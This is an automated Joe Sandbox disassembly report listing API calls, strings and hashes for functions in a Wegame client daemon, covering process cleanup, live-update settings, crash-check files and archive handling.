                                                                • Opcode Fuzzy Hash: 9a2d8ec46530e4738085c5a7ea1d63d374ad8af8d3cda6646221057f8eb07a82
                                                                • Instruction Fuzzy Hash: 6D8132B1E00318AADB24EB65CC85FDE737CAF05319F5005EAE509A2181DB789F89CF59
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 00462482
                                                                • ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?), ref: 004624AA
                                                                • GetCurrentProcessId.KERNEL32 ref: 004624B1
                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004624DE
                                                                • memset.VCRUNTIME140(?,00000000,00000228,00000002,00000000), ref: 004624FC
                                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00462516
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 00462540
                                                                • ?extract_name@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV34@@Z.COMMON(?,?,00000000,0000022C), ref: 00462551
                                                                • OpenProcess.KERNEL32(00100411,00000000,?,?,00000000,0000022C), ref: 00462590
                                                                • SetLastError.KERNEL32(00000000), ref: 004625A2
                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 004625AB
                                                                • GetLastError.KERNEL32 ref: 004625B1
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 004625BD
                                                                • CloseHandle.KERNEL32(00000000), ref: 0046261F
                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 00462633
                                                                • CloseHandle.KERNEL32(00000000,00000000,0000022C,00000000,0000022C), ref: 00462641
                                                                Strings
                                                                • [KillZombieProcess] try to kill:%d result:%d, xrefs: 004625FF
                                                                • e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp, xrefs: 004625E1
                                                                Similarity
                                                                • API ID: Process$CloseErrorHandleLastProcess32U?$char_traits@_V?$allocator@_V?$basic_string@_W@std@@$?extract_name@common@ierd_tgp@@?get_log_instance@base@@?u8to16@common@ierd_tgp@@CreateCurrentD@2@@std@@D@std@@FirstH_prolog3_Logger@1@NextOpenSimpleSnapshotString::operator=TerminateToolhelp32U?$char_traits@V34@@V?$allocator@V?$basic_string@W@2@@4@@W@2@@std@@memset
                                                                • String ID: [KillZombieProcess] try to kill:%d result:%d$e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp
                                                                • API String ID: 1726103202-2709478007
                                                                • Opcode ID: a3ea2f82d98af1e53a5278d7327f1796622590d35c4b428aaf1b81fc3c624403
                                                                • Instruction ID: ba1f9b117192c64519f23e48f9759ed13cd68eaea0b51d81efa5aa473262e887
                                                                • Opcode Fuzzy Hash: a3ea2f82d98af1e53a5278d7327f1796622590d35c4b428aaf1b81fc3c624403
                                                                • Instruction Fuzzy Hash: 8251A370D01248ABDB15EFA5CD99BDDBBB4EF08304F10406EE109B7291EB785A85CB5A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • memmove.VCRUNTIME140(0000E845,' is not a number.,00000012), ref: 00438F18
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,00000012,00000000,' is not a number.), ref: 00438F9F
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,00000012,00000000,' is not a number.), ref: 00438FD5
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,00000012,00000000,' is not a number.), ref: 0043901D
                                                                Strings
                                                                Similarity
                                                                • API ID: _invalid_parameter_noinfo_noreturn$memmove
                                                                • String ID: ' is not a number.$-
                                                                • API String ID: 15630516-3976447000
                                                                • Opcode ID: 4f83ba59974917499badd6f17ad198da8598a783605e80dd1de6cba809c897d7
                                                                • Instruction ID: ecfde5653b8913e6ff9fcab30981d65c5d9a23de95a72647fec365aad8164779
                                                                • Opcode Fuzzy Hash: 4f83ba59974917499badd6f17ad198da8598a783605e80dd1de6cba809c897d7
                                                                • Instruction Fuzzy Hash: 65C1EF70A002098BDF18CF68C851BAEBBB2FF5D314F24511EE415AB391DB39AD41CB98
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Similarity
                                                                • API ID: ExceptionH_prolog3Throwisprint
                                                                • String ID: 0123456789ABCDEF$0123456789abcdef$char$integer
                                                                • API String ID: 3477395652-1315984771
                                                                • Opcode ID: df23fe3285ffdda783cb0f10b21b18fe0ea1472d252b8c4ebd68b4fbf311249e
                                                                • Instruction ID: cae2f423a0d31ab10e0072413deee0e0e4324c30c0583a28acb7d2febd1713e9
                                                                • Opcode Fuzzy Hash: df23fe3285ffdda783cb0f10b21b18fe0ea1472d252b8c4ebd68b4fbf311249e
                                                                • Instruction Fuzzy Hash: 3E613471900509ABDB04DE65C861AFF3BA8EF96304F14815FEC46AB342DE39DA4AC794
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(f&B,?,?,?), ref: 0042413B
                                                                • memmove.VCRUNTIME140(00000000,?,f&B), ref: 0042415F
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00424250
                                                                Strings
                                                                Similarity
                                                                • API ID: freemallocmemmove
                                                                • String ID: f&B
                                                                • API String ID: 2537350866-3893873944
                                                                • Opcode ID: bfcbc0a926684f472e86ac2761fb11532ad5ae0e395f9c7fefa83d020266fb99
                                                                • Instruction ID: e8417d68822cf5112bf801bc42012a279a58ce0c92882e3c63deb248f6f899f1
                                                                • Opcode Fuzzy Hash: bfcbc0a926684f472e86ac2761fb11532ad5ae0e395f9c7fefa83d020266fb99
                                                                • Instruction Fuzzy Hash: CA5177B16083418BC714CF69D88475AFBE0FBC9364F548B6EF4A99B381C734C9498B96
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                  • Part of subcall function 0046E366: memset.VCRUNTIME140(004A8B14,00000000,00000018,?,004A8B00,0046E31B,?,00401E04), ref: 0046E373
                                                                  • Part of subcall function 0046DCF0: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,85A35C35,?,?,00475314,000000FF), ref: 0046DD17
                                                                  • Part of subcall function 0046DCF0: GetLastError.KERNEL32(?,00000000,85A35C35,?,?,00475314,000000FF), ref: 0046DD21
                                                                • IsDebuggerPresent.KERNEL32(?,?,?,00401E04), ref: 0046E346
                                                                • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00401E04), ref: 0046E355
                                                                Strings
                                                                • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0046E350
                                                                Similarity
                                                                • API ID: CountCriticalDebugDebuggerErrorInitializeLastOutputPresentSectionSpinStringmemset
                                                                • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                • API String ID: 1128651283-631824599
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(vector<T> too long,0044BC7A), ref: 0044CC1D
                                                                • ?from_json@jsonbind@@YAHPAXABVValue@Json@@@Z.COMMON(?,?,?,vector<T> too long,0044BC7A), ref: 0044CC2A
                                                                Similarity
                                                                • API ID: ?from_json@jsonbind@@Json@@@Value@Xlength_error@std@@
                                                                • String ID: vector<T> too long
                                                                • API String ID: 1902865640-3788999226
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Similarity
                                                                • API ID:
                                                                • String ID: U%B
                                                                • API String ID: 0-3843540242
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Similarity
                                                                • API ID:
                                                                • String ID: M)B
                                                                • API String ID: 0-1536653526
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Similarity
                                                                • API ID:
                                                                • String ID: gvB
                                                                • API String ID: 0-1399782011
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Similarity
                                                                • API ID: Xlength_error@std@@
                                                                • String ID:
                                                                • API String ID: 1004598685-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: caf49820fa807b94d0f106b97b3a28fc126ac1404d47f7e6d138c94fc9639a5e
                                                                • Instruction ID: 0bdc4b9da05189594fb1be22d4fe1de2010d85a29226f93dafe81bd0dcaf12bf
                                                                • Opcode Fuzzy Hash: caf49820fa807b94d0f106b97b3a28fc126ac1404d47f7e6d138c94fc9639a5e
                                                                • Instruction Fuzzy Hash: 45F16E755082118FC709CF18C5D48FAB7F1AF69310B1A82FEC8899B3A6D7359981CB51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5be85cf39b96813196059f2e2c845c93c2b18162dba278d96fafe3fd2e9a71f0
                                                                • Instruction ID: 7c6578b157f667be30280ec36bb7862d1cfe1f98d25d2fae63655fc748c403d1
                                                                • Opcode Fuzzy Hash: 5be85cf39b96813196059f2e2c845c93c2b18162dba278d96fafe3fd2e9a71f0
                                                                • Instruction Fuzzy Hash: 7F616EB5A106298BCB24CF29C8887A9F7F4FB55304F5482E9D95DE7341D774AE808F84
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: aa59ee88cf128c1e8401c6a181a001bbd7bd21adbe7b711660ed03f36a6a727c
                                                                • Instruction ID: 20224347e91579666be48488df7f76cb532f822d689253888921bdd3ad10e346
                                                                • Opcode Fuzzy Hash: aa59ee88cf128c1e8401c6a181a001bbd7bd21adbe7b711660ed03f36a6a727c
                                                                • Instruction Fuzzy Hash: AD51E172B10A058BDB1C8F29D8653ADB6A1FB44324F84837DE966DB3C2D7798845CB80
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e56e04736f2f2184acd5beb11e2b95f2201bbbbea82e3509248a38d4dc7451dc
                                                                • Instruction ID: 5315f027a34ab9a3d4b67d20a4267ca859666d811a4719d20f9402e24e7f37a3
                                                                • Opcode Fuzzy Hash: e56e04736f2f2184acd5beb11e2b95f2201bbbbea82e3509248a38d4dc7451dc
                                                                • Instruction Fuzzy Hash: 0A51F771A002354BDB608F3998803F7BFE0EB57305F5152BAD998D3282C73C995ADBA4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 004647E7
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000150,004606A7,00000001,000000FF,000000FF,000000FF,00000003), ref: 004647EE
                                                                • ?get_app_sub_path@Application@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V45@@Z.COMMON(?), ref: 00464886
                                                                • ?ReadPrivateProfile@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@00AAV45@1@Z.COMMON(tgp,Perception,?,?,?,true,00000004), ref: 00464948
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,true,00000004), ref: 00464962
                                                                • ?ReadPrivateProfile@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@00AAV45@1@Z.COMMON(tgp,Guid,?,?,?,0048BBC7,00000000,?,?,?,true,00000004), ref: 00464A14
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,0048BBC7,00000000,?,?,?,true,00000004), ref: 00464A2E
                                                                • ?ReadPrivateProfile@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@00AAV45@1@Z.COMMON(tgp,OldVersion,?,?,?,0048BBC7,00000000,?,?,?,0048BBC7,00000000,?,?,?,true), ref: 00464ACF
                                                                • ?ReadPrivateProfile@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@00AAV45@1@Z.COMMON(tgp,TargetVersion,?,?,?,0048BBC7,00000000,?,?,?,0048BBC7,00000000,?,?,?,0048BBC7), ref: 00464B8A
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,0048BBC7,00000000,?,?,?,0048BBC7,00000000,?,?,?,0048BBC7,00000000), ref: 00464BA4
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,0048BBC7,00000000,?,?,?,0048BBC7,00000000,?,?,?,true,00000004), ref: 00464AE9
                                                                  • Part of subcall function 0043DF1B: __EH_prolog3.LIBCMT ref: 0043DF22
                                                                  • Part of subcall function 00420E50: memmove.VCRUNTIME140(00000000,00000000,00000000,00420411,00000000,00000000,00000000,?,00423F52,00000000,00000001), ref: 00420E77
                                                                • ?ReadPrivateProfile@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@0AAHAAV45@@Z.COMMON(tgp,ExitOpSource,00000000,?), ref: 00464C24
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,0048BBC7,00000000,?,?,?,0048BBC7,00000000), ref: 00464C3F
                                                                • ?to_string@version_t@common@ierd_tgp@@QAE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.COMMON(?,?,?,?,?,?,?,?,0048BBC7,00000000,?,?,?,0048BBC7,00000000), ref: 00464C62
                                                                • ?WritePrivateProfile@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@000@Z.COMMON(tgp,OverwriteStatus,?,?,0048BBC7,00000000,?,?,?,?,?,?,?,?,0048BBC7,00000000), ref: 00464CC2
                                                                • GetLastError.KERNEL32(?,0048BBC7,00000000,?,?,?,?,?,?,?,?,0048BBC7,00000000), ref: 00464CE0
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON(?,?,00000000,?,?,?,?,?,?,0000000F,?,?,00000000,?), ref: 00464DA3
                                                                • ?report@Qos@qos@adapt_for_imports@ierd_tgp@@QAE_NABUQos_data_base@234@W4Qos_occasion@234@@Z.COMMON(?,00000001,?,?,00000000,?,?,?,?,?,?,0000000F,?,?,00000000,?), ref: 00464DB3
                                                                Strings
                                                                Similarity
                                                                • API ID: D@std@@U?$char_traits@V?$allocator@V?$basic_string@$PrivateProfile@Sys_wrapper@common@ierd_tgp@@$?get_log_instance@base@@Logger@1@Read$D@2@@std@@00V45@1@$D@2@@std@@ErrorLastV45@@$?get_app_sub_path@?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@?report@?to_string@version_t@common@ierd_tgp@@Application@common@ierd_tgp@@D@2@@std@@0D@2@@std@@000@H_prolog3H_prolog3_Qos@123@Qos@qos@adapt_for_imports@ierd_tgp@@Qos_data_base@234@Qos_occasion@234@@Writememmove
                                                                • String ID: ExitOpSource$Guid$OldVersion$OverwriteStatus$Perception$TargetVersion$[Liveupdate][SolveUpdateResultAndQos]start_type:{} error:{}({}), wait:{}, move:{}$[Liveupdate]read tempfile, rs:{}, guid:{}$[Liveupdate]read tempfile, rs:{}, old_verson:{}$[Liveupdate]read tempfile, rs:{}, perction:{}$[Liveupdate]read tempfile, rs:{}, target_version:{}$e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp$tgp$true$update.tmp
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 0043E465
                                                                • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,000000F4), ref: 0043E498
                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,000000F4), ref: 0043E4B2
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,?,?,?,?,000000F4), ref: 0043E4BC
                                                                  • Part of subcall function 0043DF1B: __EH_prolog3.LIBCMT ref: 0043DF22
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,?,?,?,?,000000F4), ref: 0043E509
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,?,?,?,?,000000F4), ref: 0043E553
                                                                • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000082,00000000), ref: 0043E5F8
                                                                • CloseHandle.KERNEL32(00000000), ref: 0043E604
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 0043E60C
                                                                • GetLastError.KERNEL32(00000000,00000005,e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\crashchecker.cpp,000000A1,0048BBC7), ref: 0043E649
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000000,?,?), ref: 0043E75A
                                                                Strings
                                                                Similarity
                                                                • API ID: ?get_log_instance@base@@Logger@1@$File$CloseCreateDeleteErrorExistsH_prolog3H_prolog3_HandleLastPath
                                                                • String ID: Before exit, delete run flag file fail.$Before exit, delete run flag file.$Before exit, prepare create hash file failed. err %d$Before exit, run flag file not find.$Before exit, write hash failed. %ws$Flag$e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\crashchecker.cpp$fileinfo.hash$login_pic\
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00422CB0
                                                                • memmove.VCRUNTIME140(?,?,?), ref: 00422CCD
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00422D66
                                                                • memset.VCRUNTIME140(?,00000000,00000200,?,?), ref: 00422DD0
                                                                • strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000200,?), ref: 00422E04
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?), ref: 00422E35
                                                                • strrchr.VCRUNTIME140(?,0000003A,?,?,?,?,?,?), ref: 00422E4F
                                                                • memset.VCRUNTIME140(?,00000000,00000200,?,?,?,?,?,?,?,?), ref: 00422E82
                                                                • memset.VCRUNTIME140(?,00000000,00000200), ref: 00422EDF
                                                                • strncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000200,?,00000000), ref: 00422EFD
                                                                • fopen_s.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,0048B640), ref: 00422F8E
                                                                • fseek.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000), ref: 00422FA6
                                                                • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00422FBB
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00423058
                                                                Strings
                                                                Similarity
                                                                • API ID: memset$_invalid_parameter_noinfo_noreturnfclose$fopen_sfreefseekmemmovestrcpy_sstrncpy_sstrrchr
                                                                • String ID: ZIP_IO::OpenFile() $ZIP_IO::OpenFile() $ZIP_IO::OpenFile() $ZIP_IO::OpenFile() $ZIP_IO::OpenFile()
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • ?tolower@?$ctype@_W@std@@QBE_W_W@Z.MSVCP140(0000007C), ref: 00442307
                                                                • ?tolower@?$ctype@_W@std@@QBE_W_W@Z.MSVCP140(00000030), ref: 00442333
                                                                • ?is@?$ctype@D@std@@QBE_NFD@Z.MSVCP140(00000004,?), ref: 00442353
                                                                • ?tolower@?$ctype@_W@std@@QBE_W_W@Z.MSVCP140(00000025), ref: 0044238B
                                                                • ?tolower@?$ctype@_W@std@@QBE_W_W@Z.MSVCP140(00000024), ref: 004423CC
                                                                • ?narrow@?$ctype@D@std@@QBEDDD@Z.MSVCP140(?,00000000), ref: 00442401
                                                                • ?tolower@?$ctype@_W@std@@QBE_W_W@Z.MSVCP140(0000002A), ref: 0044247D
                                                                • ?is@?$ctype@D@std@@QBE_NFD@Z.MSVCP140(00000004,?), ref: 004424AB
                                                                • ?tolower@?$ctype@_W@std@@QBE_W_W@Z.MSVCP140(0000002E), ref: 004424E5
                                                                • ?tolower@?$ctype@_W@std@@QBE_W_W@Z.MSVCP140(0000002A), ref: 00442507
                                                                • ?is@?$ctype@D@std@@QBE_NFD@Z.MSVCP140(00000004,?), ref: 00442530
                                                                • ?narrow@?$ctype@D@std@@QBEDDD@Z.MSVCP140(?,00000000), ref: 00442577
                                                                • ?tolower@?$ctype@_W@std@@QBE_W_W@Z.MSVCP140(0000007C), ref: 00442629
                                                                • ?narrow@?$ctype@D@std@@QBEDDD@Z.MSVCP140(?,00000000), ref: 00442669
                                                                • ?tolower@?$ctype@_W@std@@QBE_W_W@Z.MSVCP140(0000007C), ref: 00442746
                                                                • ?tolower@?$ctype@_W@std@@QBE_W_W@Z.MSVCP140(00000020), ref: 0044280D
                                                                Strings
                                                                Similarity
                                                                • API ID: ?tolower@?$ctype@_W@std@@$D@std@@$?is@?$ctype@?narrow@?$ctype@
                                                                • String ID: 3
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,?), ref: 0041BE37
                                                                • memset.VCRUNTIME140(?,00000000,00000200,00000003,?,?,85A35C35), ref: 0041BF7E
                                                                • wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?), ref: 0041C068
                                                                • _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,?,?,-00000010,00000000,?,?,?), ref: 0041C152
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?), ref: 0041C198
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?), ref: 0041C23E
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?), ref: 0041C29D
                                                                • wcschr.VCRUNTIME140(00000000,0000005C,00000000,?,?), ref: 0041C2E6
                                                                • memset.VCRUNTIME140(?,00000000,00000400), ref: 0041C2FC
                                                                • wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000200,00000000,00000000,?,00000000,00000400), ref: 0041C316
                                                                Strings
                                                                Similarity
                                                                • API ID: _invalid_parameter_noinfo_noreturn$memset$_wcsicmpwcschrwcscpy_swcsncpy_s
                                                                • String ID: 7$7$VFileSysBase::CreateFile $VFileSysBase::CreateFile() $VFileSysBase::CreateFile() $VFileSysBase::CreateFile() $VFileSysBase::GetNameTableEntrySize()
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 00448EF3
                                                                • ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?), ref: 00448F2D
                                                                  • Part of subcall function 00441E85: __EH_prolog3.LIBCMT ref: 00441E8C
                                                                • _Copy_construct_from.LIBCPMT ref: 00448F59
                                                                  • Part of subcall function 0044DF19: __EH_prolog3.LIBCMT ref: 0044DF20
                                                                  • Part of subcall function 0044DF19: _Copy_construct_from.LIBCPMT ref: 0044DF48
                                                                  • Part of subcall function 0044DF19: ?send_msg@@YAXPBDV?$shared_ptr@Umsg_base@@@std@@@Z.COMMON(00448F66), ref: 0044DF55
                                                                • ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?), ref: 00448F9B
                                                                • ?instance@Application@common@ierd_tgp@@SAPAV123@XZ.COMMON ref: 00448FE7
                                                                • ?get_workingdir_path@Application@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.COMMON(?), ref: 00448FF3
